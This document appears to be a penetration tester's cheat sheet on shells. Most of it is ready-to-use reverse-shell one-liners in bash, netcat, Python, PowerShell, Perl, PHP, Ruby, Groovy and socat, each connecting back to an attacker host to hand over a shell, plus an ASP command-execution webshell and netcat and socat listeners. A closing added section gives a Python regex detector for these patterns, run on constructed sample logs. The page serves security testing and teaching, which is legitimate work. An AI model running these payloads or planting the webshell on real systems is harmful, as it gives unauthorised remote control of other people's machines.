# Shells

> In computing, a shell is a user interface for access to an operating system's services. In general, operating system shells use either a command-line interface or graphical user interface, depending on a computer's role and particular operation.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Shell_\(computing\))

## General

* [Reverse Shell Cheat Sheet | pentestmonkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Reverse Shell Cheat Sheet | PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [Reverse Shell Generator](https://www.revshells.com)

Webshells in Kali

```
/usr/share/laudanum
/usr/share/webshells
```

[GitHub - tennc/webshell: This is a webshell open source project](https://github.com/tennc/webshell.git)\
E.g. `/usr/share/webshell/asp/webshell.asp`

## TTY

See [Terminal config & TTY](/the-pentesters-cheat-sheet/exploitation/shells/02-tty.md)

## Listeners

### netcat

[SANS Netcat cheat sheet](https://www.sans.org/posters/netcat-cheat-sheet/)\
Note: if the connection back does not arrive, retry on a port that is usually allowed outbound, such as **443**

```bash
nc -nlvp <port>
```

Listening with `rlwrap` (adds readline line editing, so e.g. arrow keys and command history work in the shell)

```bash
rlwrap nc -lvnp <port>
```

### tcpdump

Listen for incoming ICMP messages (e.g. ping)

```bash
sudo tcpdump -i tun0 icmp
sudo tcpdump ip proto \\icmp -i tun0
```

## Reverse shells

### bash

```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

```bash
"bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'"
```

```bash
exec 5<>/dev/tcp/<ip>/<port>
```

### netcat

```bash
nc -e /bin/sh <ip> <port>
```

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
```

### python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Powershell

See [PowerShell](/the-pentesters-cheat-sheet/misc/powershell.md)

Reverse shell (from <https://tryhackme.com/room/introtoshells>)

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

### perl

```bash
# note: the variable is $i throughout and the shell flag is a lowercase -i
perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### php

Linux: [php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

Windows: [windows-php-reverse-shell/Reverse Shell.php at master · Dhayalanb/windows-php-reverse-shell · GitHub](https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php)

```bash
php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### ruby

```bash
# note: the shell flag is a lowercase -i
ruby -rsocket -e'f=TCPSocket.open("<ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

### aspx

```
/usr/share/webshells/aspx/cmdasp.aspx
```

```asp
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("some cmd here")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

### java

```groovy
// Groovy syntax (the `as String[]` cast is Groovy, not plain Java)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Socat

[socat - Multipurpose relay](http://www.dest-unreach.org/socat)

Listener

```bash
socat TCP-L:<port> -
```

Connect (Linux)

```bash
socat TCP:<ip>:<port> EXEC:"/bin/bash -li"
```

Connect (Windows)

```bash
socat TCP:<ip>:<port> EXEC:powershell.exe,pipes
```

#### Encrypted (and TTY)

Create cert

```bash
# self-signed certificate; socat expects key and cert concatenated in one PEM file
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
```

Listener

```bash
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0
```

Connect (Linux)

```bash
socat OPENSSL:<ip>:<port>,verify=0 EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
```
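As an added example (not part of the original cheat sheet), a small Python triage script that flags the reverse-shell patterns listed above when run over process-creation telemetry. The `pid user cmdline` record format and the sample lines are constructed for this example, and the patterns are intentionally broad for analyst review rather than blocking.

```python
import re

# Indicator patterns derived from the reverse-shell one-liners on this page.
# They are deliberately broad: the aim is triage of process-creation telemetry
# (pid, user, command line), so an analyst reviews the hits rather than blocking.
INDICATORS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/(tcp|udp)/\S+/\d+")),
    ("netcat -e exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-z]*e\s*/bin/(ba)?sh")),
    ("mkfifo pipe to netcat", re.compile(r"mkfifo\b.*\|\s*(nc|ncat|netcat)\b")),
    ("python socket+dup2", re.compile(r"socket\.socket\(.*dup2\(.*subprocess")),
    ("perl socket exec", re.compile(r"socket\(S,PF_INET.*exec\(")),
    ("php fsockopen exec", re.compile(r"fsockopen\(.*exec\(")),
    ("ruby TCPSocket exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("powershell TCPClient loop", re.compile(r"Net\.Sockets\.TCPClient.*GetStream\(\)", re.I)),
    ("socat EXEC to shell", re.compile(r"\bsocat\b.*\b(TCP|OPENSSL):\S+.*EXEC:")),
]


def classify(cmdline):
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan_cmdlines(records):
    """Scan 'pid user cmdline' records; return (pid, user, indicators) for hits only."""
    hits = []
    for rec in records:
        pid, user, cmdline = rec.split(maxsplit=2)
        names = classify(cmdline)
        if names:
            hits.append((int(pid), user, names))
    return hits


# Constructed sample telemetry (not real logs); mixes hits with benign look-alikes.
SAMPLE_LOG = [
    "1201 www-data bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'",
    "1202 www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f",
    "1203 alice nc -lvnp 4444",                  # plain listener, no shell handed over
    "1204 bob socat TCP:10.0.0.1:443 EXEC:/bin/bash -li",
    "1205 alice python3 -c \"import socket; print(socket.gethostname())\"",
    "1206 deploy tar -cf /dev/tcp.tar ./build",  # looks like /dev/tcp but is a file name
    "1207 svc powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',443);$stream = $client.GetStream()\"",
]

if __name__ == "__main__":
    for pid, user, names in scan_cmdlines(SAMPLE_LOG):
        print(f"pid={pid} user={user} indicators={', '.join(names)}")
```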

